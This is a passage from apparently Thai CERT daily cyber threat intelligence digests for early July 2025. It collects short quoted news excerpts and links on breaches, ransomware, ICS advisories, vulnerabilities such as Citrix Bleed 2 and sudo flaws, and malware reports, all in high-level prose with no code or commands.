        https://www.eset.com/us/about/newsroom/research/eset-research-russias-gamaredon-apt-group-unleashed-spearphishing-campaigns-against-ukraine-with-an-evolved-toolset/
        https://www.welivesecurity.com/en/eset-research/gamaredon-2024-cranking-out-spearphishing-campaigns-ukraine-evolved-toolset/
        https://web-assets.esetstatic.com/wls/en/papers/white-papers/gamaredon-in-2024.pdf
        https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-gamaredon-ukraine-phishing

      Breaches/Hacks/Leaks

      • US Calls Reported Threats By Pro-Iran Hackers To Release Trump-Tied Material a ‘Smear Campaign’
        "Pro-Iran hackers have threatened to release emails supposedly stolen from people connected to President Donald Trump, according to a news report, a move that federal authorities call a “calculated smear campaign.” The United States has warned of continued Iranian cyberattacks following American strikes on Iran’s nuclear facilities and the threats those could pose to services, economic systems and companies. The Cybersecurity and Infrastructure Security Agency said late Monday that the threat to expose emails about Trump is “nothing more than digital propaganda” meant to damage Trump and other federal officials."
        https://www.securityweek.com/us-calls-reported-threats-by-pro-iran-hackers-to-release-trump-tied-material-a-smear-campaign/
      • Medical Device Company Surmodics Reports Cyberattack, Says It’s Still Recovering
        "Minnesota-based company Surmodics said a cyberattack on June 5 forced the medical device manufacturer to shut down parts of its IT system. Surmodics is the largest U.S. provider of outsourced hydrophilic coatings used to reduce friction for objects such as intravascular medical devices. Last month its IT team discovered unauthorized access in its network and took systems offline, while using alternative methods to accept customer orders and ship products. Law enforcement has been notified, according to a filing with the U.S. Securities and Exchange Commission (SEC)."
        https://therecord.media/surmodics-medical-device-company-reports-cybersecurity-incident
      • Hacker With ‘Political Agenda’ Stole Data From Columbia, University Says
        "A hacktivist with a “political agenda” broke into Columbia University IT systems and stole “targeted” student data in recent weeks, a university official said Tuesday. It is unclear how long the hacker was in university systems but a Columbia spokesperson said there has been no threat activity detected since June 24. Last week, the school said it was investigating a cyberattack and the university’s website and other systems were intermittently offline. “Our investigation has indicated the hackers are highly sophisticated and were very targeted in their theft of documents,” the university official said. “They broke in and stole student data with the apparent goal of furthering their political agenda.”"
        https://therecord.media/hacker-political-agenda-columbia-cyberattack
      • Ransomware Gang Attacks German Charity That Feeds Starving Children
        "Deutsche Welthungerhilfe (WHH), the German charity that aims to develop sustainable food supplies in some of the world’s most impoverished countries, has been attacked by a ransomware gang. The charity, whose name literally translates as World Hunger Help, reached 16.4 million people in 2023. It is currently providing emergency aid to people in Gaza, Ukraine, Sudan and other countries and regions where there is an urgent need for food, water, medicine and basic necessities. A spokesperson confirmed to Recorded Future News that WHH had been targeted by a ransomware-as-a-service (RaaS) group which recently listed the charity on its darknet leak site."
        https://therecord.media/welthungerhilfe-german-hunger-relief-charity-ransomware-attack
      • Hacktivists' Claimed Breach Of Nuclear Secrets Debunked
        "Security experts are dismissing a pro-Iranian hacktivist group's claim to have breached Indian nuclear secrets in reprisal for the country's support of Israel. The LulzSec Black group last week claimed to have hacked "the company responsible for Indian nuclear reactors" and to have stolen 80 databases, of which it was now selling 17 databases containing 5.2 gigabytes of data. The group claimed the information detailed the precise location of India's nuclear reactors, numerous chemical laboratories, employee personally identifiable information, industrial and engineering information, precise details of guard shifts and "other sensitive data related to infrastructure.""
        https://www.bankinfosecurity.com/hacktivists-claimed-breach-nuclear-secrets-debunked-a-28881

      General News

      • Cybersecurity Essentials For The Future: From Hype To What Works
        "Cybersecurity never stands still. One week it’s AI-powered attacks, the next it’s a new data breach, regulation, or budget cut. With all that noise, it’s easy to get distracted. But at the end of the day, the goal stays the same: protect the business. CISOs are being asked to juggle more, with tighter resources, more boardroom time, and threats that keep changing. Here are five areas that deserve your attention now and going forward."
        https://www.helpnetsecurity.com/2025/07/02/cybersecurity-essentials-best-practices/
      • Scammers Are Tricking Travelers Into Booking Trips That Don’t Exist
        "Not long ago, travelers worried about bad weather. Now, they’re worried the rental they booked doesn’t even exist. With AI-generated photos and fake reviews, scammers are creating fake listings so convincing, people are losing money before they even pack a bag. The FTC reported that Americans lost $274 million to vacation and travel fraud in 2024."
        https://www.helpnetsecurity.com/2025/07/02/ai-travel-scams/
      • DOJ Investigates Ex-Ransomware Negotiator Over Extortion Kickbacks
        "An ex-ransomware negotiator is under criminal investigation by the Department of Justice for allegedly working with ransomware gangs to profit from extortion payment deals. The suspect is a former employee of DigitalMint, a Chicago-based incident response and digital asset services company that specializes in ransomware negotiation and facilitating cryptocurrency payments to receive a decryptor or prevent stolen data from being publicly released. The company claims to have conducted over 2,000 ransomware negotiations since 2017. Bloomberg first reported that the DOJ is investigating whether the suspect worked with ransomware gangs to negotiate payments, then allegedly received a cut of the ransom that was charged to the customer."
        https://www.bleepingcomputer.com/news/security/doj-investigates-ex-ransomware-negotiator-over-extortion-kickbacks/
      • Spain Arrests Hackers Who Targeted Politicians And Journalists
        "The Spanish police have arrested two individuals in the province of Las Palmas for their alleged involvement in cybercriminal activity, including data theft from the country's government. The duo has been described as a "serious threat to national security" and focused their attacks on high-ranking state officials as well as journalists. They leaked samples of the stolen data online to build notoriety and inflate the selling price. "The investigation began when agents detected the leakage of personal data affecting high-level institutions of the State across various mass communication channels and social networks," reads the police announcement."
        https://www.bleepingcomputer.com/news/security/spain-arrests-hackers-who-targeted-politicians-and-journalists/
        https://therecord.media/spain-arrests-two-data-leaks-targeting-gov-officials-journalists
      • Spain TLD’s Recent Rise To Dominance
        "Threat actors use various Top-Level Domains (TLDs) to host malicious content and serve as Command and Control (C2) locations. Commonly abused TLDs used to host credential phishing include .ru and .com. More recently, Cofense Intelligence detected a meteoric increase in abuse of the .es TLD for malicious activity. From Q4 2024 to Q1 2025, .es TLD abuse increased 19x and became part of the top 10 abused TLDs in credential phishing. This increase applies to both first-stage URLs (links embedded in emails or attachments) and second-stage URLs (sites visited after the embedded URLs). These second-stage URLs typically host credential phishing pages or exfiltrate information. It is these second-stage URLs that have seen the greatest increase in .es TLD abuse."
        https://cofense.com/blog/spain-tld-s-recent-rise-to-dominance
      • 1 Year Later: Lessons Learned From The CrowdStrike Outage
        "One year after a buggy CrowdStrike update knocked IT systems offline, organizations seeking to strike the right balance between security and productivity have viewed the incident as a learning opportunity. The cost of the CrowdStrike outage was estimated at $5.4 billion, affecting payment systems, airline reservations, and a variety of other industries. The impact of the outage highlights why many operational technology (OT) teams are as sensitive to patches and other updates in their critical infrastructure, as they are highly averse to outages that can happen if such updates are defective."
        https://www.darkreading.com/vulnerabilities-threats/1-year-later-lessons-crowdstrike-outage
      • Rethinking Cyber-Risk As Traditional Models Fall Short
        "Rapidly advancing technology, increasingly sophisticated attackers, and a rise in supply chain threats make systemic cyber-risk difficult to assess. An influx of vulnerabilities that continue to amass each year, paired with faster exploit times, doesn't help. Risk models developed to measure systemic cyber-risk can help organizations determine the likelihood of a disruptive attack and expose security holes. Insurers use modeling to assess systemic cyber-risk, which influences underwriting, coverage, and policy pricing decisions."
        https://www.darkreading.com/cyber-risk/rethinking-cyber-risk-traditional-models-fall-short
      • Like Ransoming a Bike: Organizational Muscle Memory Drives The Most Effective Response
        "Ransomware has become an enterprise boogeyman, experiencing a 37 percent increase over 2024 according to the Verizon Data Breach Investigations Report (PDF), being present in nearly half of all breaches. It would seem that resistance is futile as all the technology and training put in place fail to repel attacks, and all the best practices in backups and redundancy provide only cold comfort. But in the old joke of a tiger pursuing two friends, there are lessons in survivability that translate in a business context. However, in this context it’s not just being the faster friend; it’s organizational athleticism and muscle memory fostering agility and quick, decisive thinking that can make a massive difference in impact. And as with athletic performance, that muscle memory is earned with proper training, form, and practice."
        https://www.securityweek.com/like-ransoming-a-bike-organizational-muscle-memory-drives-the-most-effective-response/
      • That Network Traffic Looks Legit, But It Could Be Hiding a Serious Threat
        "Where do you turn when firewalls and endpoint detection and response (EDR) fall short at detecting the most important threats to your organization? Breaches at edge devices and VPN gateways have risen from 3% to 22%, according to Verizon's latest Data Breach Investigations report. EDR solutions are struggling to catch zero-day exploits, living-off-the-land techniques, and malware-free attacks. Nearly 80% of detected threats use malware-free techniques that mimic normal user behavior, as highlighted in CrowdStrike's 2025 Global Threat Report. The stark reality is that conventional detection methods are no longer sufficient as threat actors adapt their strategies, using clever techniques like credential theft or DLL hijacking to avoid discovery."
        https://thehackernews.com/2025/07/that-network-traffic-looks-legit-but-it.html

      References
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • CISA Releases Seven Industrial Control Systems Advisories

      The Cybersecurity and Infrastructure Security Agency (CISA) released seven Industrial Control Systems (ICS) advisories on 2 July B.E. 2568 (2025). These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. They are as follows:

      • ICSA-25-182-01 FESTO Didactic CP, MPS 200, and MPS 400 Firmware
      • ICSA-25-182-02 FESTO Automation Suite, FluidDraw, and Festo Didactic Products
      • ICSA-25-182-03 FESTO CODESYS
      • ICSA-25-182-04 FESTO Hardware Controller, Hardware Servo Press Kit
      • ICSA-25-182-05 Voltronic Power and PowerShield UPS Monitoring Software
      • ICSA-25-182-06 Hitachi Energy Relion 670/650 and SAM600-IO Series
      • ICSA-25-182-07 Hitachi Energy MSM

      CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations. Further details are available at https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-releases-seven-industrial-control-systems-advisories

      References
      https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-releases-seven-industrial-control-systems-advisories
      Follow the latest news on the webboard or on Facebook at NCSA Thailand

      Posted in OT Cyber Security News
      NCSA_THAICERT
    • Cyber Threat Intelligence 02 July 2025

      Energy Sector

      • Protecting The Core: Securing Protection Relays In Modern Substations
        "Substations are critical nexus points in the power grid, transforming high-voltage electricity to ensure its safe and efficient delivery from power plants to millions of end-users. At the core of a modern substation lies the protection relay: an intelligent electronic device (IED) that plays a critical role in maintaining the stability of the power grid by continuously monitoring voltage, current, frequency, and phase angle. Upon detecting a fault, it instantly isolates the affected zone by tripping circuit breakers, thus preventing equipment damage, fire hazards, and cascading power outages."
        https://cloud.google.com/blog/topics/threat-intelligence/securing-protection-relays-modern-substations

      Industrial Sector

      • FESTO Didactic CP, MPS 200, And MPS 400 Firmware
        "Successful exploitation of this vulnerability could allow an attacker to write arbitrary data and code to protected memory areas or read sensitive data to launch further attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-01
      • FESTO Automation Suite, FluidDraw, And Festo Didactic Products
        "Successful exploitation of these vulnerabilities could allow an attacker to gain full control of the host system, including remote code execution."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-02
      • FESTO CODESYS
        "Successful exploitation of these vulnerabilities could allow an attacker to block legitimate user connections, crash the application, or authenticate without proper credentials."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-03
      • FESTO Hardware Controller, Hardware Servo Press Kit
        "Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized system commands with root privileges."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-04
      • Voltronic Power And PowerShield UPS Monitoring Software
        "Successful exploitation of these vulnerabilities could allow an unauthenticated attacker to remotely make configuration changes, resulting in the shutdown of UPS-connected devices or execution of arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-05
      • Hitachi Energy Relion 670/650 And SAM600-IO Series
        "Successful exploitation of this vulnerability could allow attackers to cause a denial-of-service that disrupts critical functions in the device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-06
      • Hitachi Energy MSM
        "Successful exploitation of this vulnerability could allow attackers to execute untrusted code, potentially leading to unauthorized actions or system compromise."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-07

      Vulnerabilities

      • Critical RCE Vulnerability In Anthropic MCP Inspector - CVE-2025-49596
        "Oligo Security Research reported a Remote Code Execution (RCE) vulnerability and DNS rebinding in the MCP Inspector project to Anthropic, leading to CVE-2025-49596 being issued, with a Critical CVSS Score of 9.4. This is one of the first critical RCEs in Anthropic’s MCP ecosystem, exposing a new class of browser-based attacks against AI developer tools. With code execution on a developer’s machine, attackers can steal data, install backdoors, and move laterally across networks - highlighting serious risks for AI teams, open-source projects, and enterprise adopters relying on MCP. When a victim visits a malicious website, the vulnerability allows attackers to run arbitrary code on the visiting host running the official MCP inspector tool that is used by default in many use cases."
        https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
        https://thehackernews.com/2025/07/critical-vulnerability-in-anthropics.html
      • Chrome Zero-Day, 'FoxyWallet' Firefox Attacks Threaten Browsers
        "Both the Google Chrome and Mozilla Firefox browsers currently are under separate attacks, the former from actors exploiting a zero-day bug and the latter from a list of malicious extensions that are actively compromising users. Google rushed out a stable channel update on Monday to patch the fourth zero-day flaw found in its browser this year, a high-severity type confusion flaw tracked as CVE-2025-6554, according to a Google security advisory. The flaw, which allows attackers to execute arbitrary code, is under active exploitation and should be patched immediately. Meanwhile, 45 malicious Firefox extensions impersonating legitimate cryptocurrency wallet add-ons are targeting Mozilla Firefox users, compromising their client devices."
        https://www.darkreading.com/cyberattacks-data-breaches/browsers-targeted-chrome-zero-day-malicious-firefox-extensions
        https://www.bleepingcomputer.com/news/security/google-fixes-fourth-actively-exploited-chrome-zero-day-of-2025/
        https://thehackernews.com/2025/07/google-patches-critical-zero-day-flaw.html
        https://www.securityweek.com/chrome-138-update-patches-zero-day-vulnerability/
        https://www.helpnetsecurity.com/2025/07/01/google-patches-actively-exploited-chrome-cve-2025-6554/
        https://www.infosecurity-magazine.com/news/google-patch-chrome-zero-day/
        https://www.malwarebytes.com/blog/news/2025/07/update-your-chrome-to-fix-new-actively-exploited-zero-day-vulnerability
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-48927 TeleMessage TM SGNL Initialization of a Resource with an Insecure Default Vulnerability
        CVE-2025-48928 TeleMessage TM SGNL Exposure of Core Dump File to an Unauthorized Control Sphere Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-adds-two-known-exploited-vulnerabilities-catalog
      • Sudo Local Privilege Escalation Vulnerabilities Fixed (CVE-2025-32462, CVE-2025-32463)
        "If you haven’t recently updated the Sudo utility on your Linux box(es), you should do so now, to patch two local privilege escalation vulnerabilities (CVE-2025-32462, CVE-2025-32463) that were disclosed on Monday. Sudo is a command-line utility in Unix-like operating systems that allows a low-privilege user to execute a command as another user, typically the root/administrator user. The utility effectively grants temporary elevated privileges without requiring the user to log in as root."
        https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/
      • Can You Trust That Verified Symbol? Exploiting IDE Extensions Is Easier Than It Should Be
        "Integrated Development Environments (IDEs) play a major role in today’s programming landscape. They provide comprehensive environments in which programmers can write, test, and debug code efficiently. However, OX’s research, conducted in May and June 2025, reveals critical security vulnerabilities in how popular IDEs handle extension verification. IDEs typically include basic built-in functionality, but their capabilities extend through a wide range of third-party extensions available on marketplaces and external websites. This means that any risk in the IDE could result in far-reaching consequences."
        https://www.ox.security/can-you-trust-that-verified-symbol-exploiting-ide-extensions-is-easier-than-it-should-be/
        https://thehackernews.com/2025/07/new-flaw-in-ides-like-visual-studio.html

      Malware

      • How Analyzing 700,000 Security Incidents Helped Our Understanding Of Living Off The Land Tactics
        "This article shares initial findings from internal Bitdefender Labs research into Living off the Land (LOTL) techniques. Our team at Bitdefender Labs, comprised of hundreds of security researchers with close ties to academia, conducted this analysis as foundational research during the development of our GravityZone Proactive Hardening and Attack Surface Reduction (PHASR) technology. The results reveal adversaries’ persistent and widespread use of trusted system tools in most significant security incidents. While this research was primarily for our internal development efforts, we believe these initial insights from Bitdefender Labs are valuable for broader understanding and we are sharing them now, ahead of a more comprehensive report."
        https://www.helpnetsecurity.com/2025/07/01/bitdefender-lotl-security-incidents-phasr/
      • FileFix (Part 2)
        "While analyzing Chrome & MS Edge’s behavior, I made an interesting observation. When an HTML page is saved using Ctrl+S or Right-click > “Save as” and either “Webpage, Single File” or “Webpage, Complete” types were selected, then the file downloaded does not have MOTW. Furthermore, this behaviour only applies if the webpage being saved has a MIME type of text/html or application/xhtml+xml. Other MIME types will result in the file being tagged with MOTW (e.g. image/png, image/svg+xml etc.)"
        https://mrd0x.com/filefix-part-2/
        https://www.bleepingcomputer.com/news/security/new-filefix-attack-runs-jscript-while-bypassing-windows-motw-alerts/
      • Stealthy WordPress Malware Drops Windows Trojan Via PHP Backdoor
        "Last month, we encountered a particularly interesting and complex malware case that stood out from the usual infections we see in compromised WordPress websites. At first glance, the site looked clean, no visible signs of defacement, no malicious redirects, and nothing suspicious in the plugin list. But beneath the surface, a hidden infection chain was quietly working to deliver a trojan to unsuspecting visitors. It was a layered attack involving PHP-based droppers, obfuscated code, IP-based evasion, auto-generated batch scripts, and a malicious ZIP archive containing a Windows-based trojan (client32.exe)."
        https://blog.sucuri.net/2025/06/stealthy-wordpress-malware-drops-windows-trojan-via-php-backdoor.html

      Breaches/Hacks/Leaks

      • Kelly Benefits Says 2024 Data Breach Impacts 550,000 Customers
        "Kelly & Associates Insurance Group (dba Kelly Benefits) is informing more than half a million people of a data breach that compromised their personal information. The Maryland-based health and life insurance agency has issued an update on a security incident it suffered last year between December 12-17, when unauthorized actors breached its IT systems and stole files. On April 9, 2025, the company stated that the incident impacted 32,234 individuals. The figure was revised multiple times until the final tally shared with authorities in the U.S. counted 553,660 individuals."
        https://www.bleepingcomputer.com/news/security/kelly-benefits-says-2024-data-breach-impacts-550-000-customers/
      • Esse Health Says Recent Data Breach Affects Over 263,000 Patients
        "Esse Health, a healthcare provider based in St. Louis, Missouri, is notifying over 263,000 patients that their personal and health information was stolen in an April cyberattack. As the largest independent physicians' group in the Greater St. Louis area, Esse Health operates 50 locations and employs over 100 physicians. The organization was made aware of a breach after the attackers took down some primary patient-facing network systems and its phone systems on April 21."
        https://www.bleepingcomputer.com/news/security/esse-health-says-recent-data-breach-affects-over-263-000-patients/
        https://www.securityweek.com/263000-impacted-by-esse-health-data-breach/
        https://securityaffairs.com/179520/data-breach/esse-health-data-breach-impacted-263000-individuals.html
      • Qantas Discloses Cyberattack Amid Scattered Spider Aviation Breaches
        "Australian airline Qantas disclosed that it detected a cyberattack on Monday after threat actors gained access to a third-party platform containing customer data. Qantas is Australia's largest airline, operating domestic and international flights across six continents and employing around 24,000 people. In a press release issued Monday night, the airline states that the attack has been contained, but a "significant" amount of data is believed to have been stolen. The breach began after a threat actor targeted a Qantas call centre and gained access to a third-party customer servicing platform."
        https://www.bleepingcomputer.com/news/security/qantas-discloses-cyberattack-amid-scattered-spider-aviation-breaches/
        https://www.itnews.com.au/news/qantas-facing-significant-data-theft-after-cyber-attack-618367
        https://www.theregister.com/2025/07/02/qantas_data_theft/

      General News

      • How Cybercriminals Are Weaponizing AI And What CISOs Should Do About It
        "In a recent case tracked by Flashpoint, a finance worker at a global firm joined a video call that seemed normal. By the end of it, $25 million was gone. Everyone on the call except the employee was a deepfake. Criminals had used AI-powered cybercrime tactics to impersonate executives convincingly enough to get the payment approved. Threat actors are building LLMs specifically for fraud and cybercrime. These are trained on stolen credentials, scam scripts, and hacking guides. Some generate phishing emails or fake invoices, others explain how to use malware or cash out stolen data, according to the AI and Threat Intelligence report from Flashpoint."
        https://www.helpnetsecurity.com/2025/07/01/defending-ai-powered-cybercrime/
      • GenAI Is Everywhere, But Security Policies Haven’t Caught Up
        "Nearly three out of four European IT and cybersecurity professionals say staff are already using generative AI at work, up ten points in a year, but just under a third of organizations have put formal policies in place, according to new ISACA research. The use of AI is becoming more prevalent within the workplace, and so regulating its use is best practice. Yet 31% of organizations have a formal, comprehensive AI policy in place, highlighting a disparity between how often AI is used versus how closely it’s regulated in workplaces."
        https://www.helpnetsecurity.com/2025/07/01/ai-work-policies-europe/
      • Federal Reserve System CISO On Aligning Cyber Risk Management With Transparency, Trust
        "In this Help Net Security interview, Tammy Hornsby-Fink, CISO at Federal Reserve System, shares how the Fed approaches cyber risk with a scenario-based, intelligence-driven strategy. She explains how the Fed assesses potential disruptions to financial stability and addresses third-party and cloud service risks. Hornsby-Fink also discusses how federal collaboration supports managing systemic threats and strengthens operational resilience."
        https://www.helpnetsecurity.com/2025/07/01/tammy-hornsby-fink-federal-reserve-system-cyber-risk/
      • Scam Centers Are Spreading, And So Is The Human Cost
        "Human trafficking tied to online scam centers is spreading across the globe, according to a new crime trend update from INTERPOL. By March 2025, people from 66 countries had been trafficked into these scam operations, with every continent affected. INTERPOL found that 74% of victims were taken to scam centers in Southeast Asia, the original hotspot for this type of crime. But these centers are now also showing up in other regions, including the Middle East, West Africa, which may be turning into a new hub, and Central America. Most of the traffickers, around 90%, came from Asia. Another 11% were from South America or Africa."
        https://www.helpnetsecurity.com/2025/07/01/interpol-human-trafficking-scam-centers/
        https://www.infosecurity-magazine.com/news/scam-centers-global-footprint/
      • Terrible Tales Of Opsec Oversights: How Cybercrooks Get Themselves Caught
        "They say that success breeds complacency, and complacency leads to failure. For cybercriminals, taking too many shortcuts when it comes to opsec delivers a little more than that. In these cases, failure might mean the criminal doesn't get access to the server with the most valuable data to copy, or fails to trick any of the victim org's staff members to execute a malicious remote access tool. Complacency, however, can get them caught, and all too often we hear about highly skilled individuals taking one too many shortcuts – the type that leads police to their doors."
        https://www.theregister.com/2025/07/01/terrible_tales_of_opsec_oversights/
      • Treasury Sanctions Global Bulletproof Hosting Service Enabling Cybercriminals And Technology Theft
        "Today, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) is designating Aeza Group, a bulletproof hosting (BPH) services provider, for its role in supporting cybercriminal activity targeting victims in the United States and around the world. BPH service providers sell access to specialized servers and other computer infrastructure designed to help cybercriminals like ransomware actors, personal information stealers, and drug vendors evade detection and resist law enforcement attempts to disrupt their malicious activities. OFAC is also designating two affiliated companies and four individuals who are Aeza Group leaders. Finally, in coordination with the United Kingdom’s (UK) National Crime Agency (NCA), OFAC is designating an Aeza Group front company in the UK."
        https://home.treasury.gov/news/press-releases/sb0185
        https://www.bleepingcomputer.com/news/security/aeza-group-sanctioned-for-hosting-ransomware-infostealer-servers/
        https://therecord.media/russia-bulletproof-hosting-aeza-group-us-sanctions
        https://www.bankinfosecurity.com/us-sanctions-aeza-group-for-hosting-infostealers-ransomware-a-28871
        https://cyberscoop.com/bulletproof-hosting-provider-aezagroup-sanctions/
      • Top Ransomware Groups June 2025: Qilin Reclaims Top Spot
        "Qilin was the top ransomware group for the second time in three months in June, suggesting that the group may be strongly benefiting from the turmoil that knocked RansomHub offline at the beginning of April. RansomHub was the top ransomware group for more than a year until rival DragonForce claimed to be taking over its infrastructure in what may have been an act of sabotage. Qilin took over the top spot in April, and after SafePay narrowly took the lead in May, Qilin returned to the top in June with a dominant showing."
        https://cyble.com/blog/top-ransomware-groups-june-2025-qilin-top-spot/
      • Like SEO, LLMs May Soon Fall Prey To Phishing Scams
        "Just as attackers have exploited search engine optimization (SEO) techniques to push phishing content in search engine results, expect to soon see them leverage AI-optimized content to influence the outputs of large language models (LLMs) for the same purpose. Making the task possible for them is the tendency by LLMs to often return incorrect domain information in response to simple natural language queries, according to a recent experiment by Netcraft."
        https://www.darkreading.com/cyber-risk/seo-llms-fall-prey-phishing-scams
      • Ransomware Reshaped How Cyber Insurers Perform Security Assessments
        "The ransomware scourge has forced cyber insurers to re-examine how they use security assessments. While the threat has been around for years, it's only fairly recently that cybercriminals realized how profitable ransomware attacks could be. As ransomware-as-a-service and double extortion tactics started to emerge, the threat landscape has shifted immensely, with more and more organizations seeing their data splashed online for all to see, accompanied with payment countdown clocks. Cyber insurance helped organizations address the ransomware threat by providing services such as ransom reimbursement, incident response, and ransom negotiation. But that support came with a price, as policies and premiums fluctuated. In fact, insurance premiums surged in 2020 and 2021."
        https://www.darkreading.com/cybersecurity-operations/ransomware-reshaped-how-cyber-insurers-perform-security-assessments
      • We've All Been Wrong: Phishing Training Doesn't Work
        "A recent study suggests, contrary to popular belief, that most phishing awareness initiatives aren't having a material impact on employee cybersecurity. One of the most widely repeated, least examined memes in the cybersecurity industry is that, even more than technical solutions, organizations can best secure themselves by teaching cyber awareness among their employees. Building a "human firewall," to protect an organization's otherwise "weakest link.""
        https://www.darkreading.com/endpoint-security/phishing-training-doesnt-work
      • How Businesses Can Align Cyber Defenses With Real Threats
        "With escalating geopolitical tensions and highly publicized cyberattacks on critical infrastructure like Change Healthcare and Colonial Pipeline, businesses worldwide are grappling with increasingly sophisticated cybercriminal tactics. Cybercriminal groups are quickly adopting the highly complex tactics once limited to the most advanced state-backed operations. In parallel, heavily sanctioned nation-states are increasingly using ransomware and cryptocurrency scams through state backed threat actors to finance their regimes."
        https://www.darkreading.com/vulnerabilities-threats/how-businesses-can-align-cyber-defenses-real-threats
      • Crypto Hack Losses In First Half Of 2025 Exceed 2024 Total
        "Around $2.47bn in cryptocurrency has been stolen via scams, hacks and exploits in H1 2025, already exceeding the total amount lost during 2024, new data from CertiK has revealed. The surge in crypto losses in 2025 is largely the result of two major security incidents – the ByBit breach and Cetus Protocol incident. Collectively, these incidents cost $1.78bn, 72% of the total. In the ByBit incident, hackers stole $1.4bn in cryptocurrency from the Dubai-based exchange in February 2025. The notorious North Korean state actor Lazarus group is suspected of carrying out the Ethereum attack, which is the largest ever crypto theft to date."
        https://www.infosecurity-magazine.com/news/crypto-hack-losses-half-exceed-2024/
      • Cyberattack On Russian Independent Media Had Links To US-Sanctioned Institute, Researchers Find
        "A Russian hosting provider allegedly involved in a recent cyberattack against independent media organizations in the country is reportedly connected to a state-affiliated research center sanctioned by the U.S., according to new research. The hosting provider, Biterika, generated one-third of the junk traffic that flooded the websites of IStories and Verstka after they published an exposé on a child sex trafficking network in Russia that allegedly involved oligarchs and other powerful figures."
        https://therecord.media/cyberattack-on-russian-media-linked-to-sanctioned-institute
      • How To Build An Effective Security Awareness Program
        "Organizations invest in advanced tools to secure their assets, but humans are still the most persistent attack vector. Each year, this is reinforced by the overwhelming number of breaches that stem from human behaviour. Ultimately, employees are being asked to be hypervigilant all the time – despite their best efforts, everybody makes mistakes, and you can’t defend what you don’t know. By building a strong security awareness and training program, you can help your employees become your first line of defense against cyberattacks."
        https://www.trendmicro.com/en_us/research/25/f/security-awareness-program.html
      • Out-Of-Band, Part 1: The New Generation Of IP KVMs And How To Find Them
        "Welcome to the first post in Out-of-Band, a series exploring the security risks of out-of-band (OoB) management devices like baseboard management controllers, serial console servers, and IP-enabled KVMs. These tools often have weaker security than the systems they control, offering attackers a path to bypass monitoring and safeguards. In this installment, we focus on the latest wave of open-source, network-connected KVMs. We’ll cover where to find them in the wild, how to detect them via network and host signals (plus SIEM), and what their source code reveals about their security posture. Bonus: These devices have been used by North Korean threat actors to spoof in-country access. So if that’s a concern, read on."
        https://www.runzero.com/blog/oob-p1-ip-kvm/

      References
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • Cyber Threat Intelligence 01 July 2025

      New Tooling

      • RIFT: New Open-Source Tool From Microsoft Helps Analyze Rust Malware
        "Microsoft’s Threat Intelligence Center has released a new tool called RIFT to help malware analysts identify malicious code hidden in Rust binaries. While Rust is becoming more popular for its speed and memory safety, those same qualities make malware written in Rust harder to analyze. RIFT is designed to cut through that complexity and make the job easier."
        https://www.helpnetsecurity.com/2025/06/30/rift-open-source-microsoft-tool-analyze-rust-malware/
        https://github.com/microsoft/RIFT

      Vulnerabilities

      • Over 1,200 Citrix Servers Unpatched Against Critical Auth Bypass Flaw
        "Over 1,200 Citrix NetScaler ADC and NetScaler Gateway appliances exposed online are unpatched against a critical vulnerability believed to be actively exploited, allowing threat actors to bypass authentication by hijacking user sessions. Tracked as CVE-2025-5777 and referred to as Citrix Bleed 2, this out-of-bounds memory read vulnerability results from insufficient input validation, enabling unauthenticated attackers to access restricted memory regions. A similar Citrix security flaw, dubbed "CitrixBleed," was exploited in ransomware attacks and breaches targeting governments in 2023 to hack NetScaler devices and move laterally across compromised networks."
        https://www.bleepingcomputer.com/news/security/over-1-200-citrix-servers-unpatched-against-critical-auth-bypass-flaw/
        https://www.helpnetsecurity.com/2025/06/30/citrixbleed-2-might-be-actively-exploited-cve-2025-5777/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-6543 Citrix NetScaler ADC and Gateway Buffer Overflow Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/06/30/cisa-adds-one-known-exploited-vulnerability-catalog
        https://securityaffairs.com/179476/hacking/u-s-cisa-adds-citrix-netscaler-flaw-to-its-known-exploited-vulnerabilities-catalog.html

      Malware

      • International Criminal Court Hit By Cyber Attack
        "The International Criminal Court (ICC) has revealed it detected a "new, sophisticated and targeted" cybersecurity incident late last week, adding it has now been contained. The incident was the second of its type against the ICC in recent years, it said in a statement. In 2023, the ICC announced it had been hacked, and the court struggled with the aftermath for weeks as it was disconnected from most systems that can access the internet."
        https://www.itnews.com.au/news/international-criminal-court-hit-by-cyber-attack-618324
      • 10 Things I Hate About Attribution: RomCom Vs. TransferLoader
        "Most of the time, delineating activities from distinct clusters and separating cybercrime from espionage can be done based on differing tactics, techniques, and procedures (TTPs), tooling, volume/scale, and targeting. However, in the case of TA829 and a cluster Proofpoint dubbed “UNK_GreenSec”, there is more ambiguity. TA829 is a cybercriminal actor that occasionally also conducts espionage aligned with Russian state interests, while UNK_GreenSec is an unusual cybercriminal cluster. TA829 overlaps with activity tracked by third-parties as RomCom, Void Rabisu, Storm-0978, CIGAR, Nebulous Mantis, Tropical Scorpius. The UNK_GreenSec cybercriminal cluster does not appear to align with publicly reported activity sets."
